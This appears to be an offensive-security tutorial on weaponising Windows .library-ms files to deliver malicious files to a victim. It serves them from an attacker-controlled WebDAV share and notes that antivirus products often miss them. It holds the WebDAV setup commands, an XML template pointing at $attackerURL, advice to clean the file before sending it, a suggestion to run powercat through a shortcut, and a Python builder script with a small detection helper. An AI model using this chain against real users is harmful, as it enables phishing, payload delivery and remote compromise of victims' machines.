Files with the extension .Library-ms (Windows Library definitions) are similar to macOS's Volumes: they describe locations whose files and directories are shown in Windows Explorer as if they were local files. Many AV/malware products do not currently detect them.

Create a Windows Library “Directory”
Preparation: Set up a WebDAV share that is reachable from the victim's system and points to a directory containing the malicious files. This can be done via the Apache2 DAV module, or for testing purposes with Python (WsgiDAV):
$ pip3 install wsgidav
$ /home/naturtrunken/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/naturtrunken/webdav
Create an XML file with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>$attackerURL</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
Notes for the XML file:
- name is the library's display name; here it is a string resource reference (@module,-resourceId) of the kind the stock libraries use, see https://learn.microsoft.com/de-de/windows/win32/shell/library-schema-entry
- version can be any integer
- isLibraryPinned means that this library is pinned to Windows Explorer's navigation pane
- iconReference defines the icon shown for the library (see e.g. https://github.com/cyqsimon/W10-Ico-Ref for the icon indexes in imageres.dll)
- templateInfo/folderType defines which columns Windows Explorer shows; the GUID above is the Documents folder type. See https://learn.microsoft.com/en-us/windows/win32/shell/schema-library-foldertype for other column sets.
- $attackerURL is the URL of a server where the attacker provides the WebDAV share with the files they want to deliver to the victim.
Caution: After the "directory" has been opened for the first time, Windows rewrites the XML file and adds values that are only valid on that computer. Therefore, restore the original content (or regenerate the file from the template) before sending it to the victim!
Now the victim can execute a file from there. You could also place a shortcut on the share which executes powercat.
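The whole procedure in one script, as an added example that is not part of the original post: it renders the template above with the share URL, flags any library file whose locations point off the machine (the check a defender would run over suspicious .library-ms attachments, and the sanity check an attacker runs before sending), and verifies that a file still matches the freshly rendered template, which covers the caution about Windows rewriting the file. The URL 192.0.2.10 is a placeholder and the "rewritten by Explorer" sample is constructed here, not captured from a real host.

```python
"""Build a .library-ms that points at a WebDAV share, and check such files.

Added example for this post; assumes the WebDAV share from the preparation
step is reachable at the placeholder URL used in main().
"""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "http://schemas.microsoft.com/windows/2009/library"

# Template taken from the XML in the post; only the url is substituted.
# Literal braces in the folderType GUID are doubled for str.format().
TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{ns}">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>{url}</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""

# http(s) URLs and UNC paths leave the machine; knownfolder:{...} or local
# drive paths are what stock libraries contain.
REMOTE = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)


def build_library_ms(attacker_url: str) -> str:
    """Render the template with the share URL (XML-escaped)."""
    return TEMPLATE.format(ns=NS, url=escape(attacker_url))


def find_remote_locations(xml_text: str) -> list[str]:
    """Return every simpleLocation url that points off the machine.

    Useful in triage: a library file arriving by mail or download whose
    location is http(s) or UNC will make Explorer fetch a listing from
    that server the moment it is opened.
    """
    root = ET.fromstring(xml_text)
    urls = [(u.text or "").strip() for u in root.iter(f"{{{NS}}}url")]
    return [u for u in urls if REMOTE.match(u)]


def is_pristine(xml_text: str, attacker_url: str) -> bool:
    """True if the file still equals a freshly rendered template.

    Opening the library on a Windows host makes Explorer rewrite the
    file with host-specific data, so run this on the copy you ship.
    Comparison is on the element tree (tag + text), not raw bytes, so
    whitespace changes are ignored but any added element is caught.
    """
    def canon(text: str) -> list[tuple[str, str]]:
        return [(e.tag, (e.text or "").strip()) for e in ET.fromstring(text).iter()]
    return canon(xml_text) == canon(build_library_ms(attacker_url))


if __name__ == "__main__":
    url = "http://192.0.2.10/"  # placeholder; use your own share's URL
    doc = build_library_ms(url)
    print(doc)
    print("remote locations:", find_remote_locations(doc))
    # Constructed stand-in for a copy Explorer has already rewritten:
    # one extra element under simpleLocation is enough to fail the check.
    opened = doc.replace("</url>", "</url><serialized>AAAA</serialized>")
    print("pristine:", is_pristine(doc, url), "/ after opening:", is_pristine(opened, url))
```

Save the output of build_library_ms() as e.g. Documents.library-ms; Explorer only honours the .library-ms extension. Because find_remote_locations() keys on the schema namespace, it also works on the stock libraries under %APPDATA%\Microsoft\Windows\Libraries, where it should return nothing.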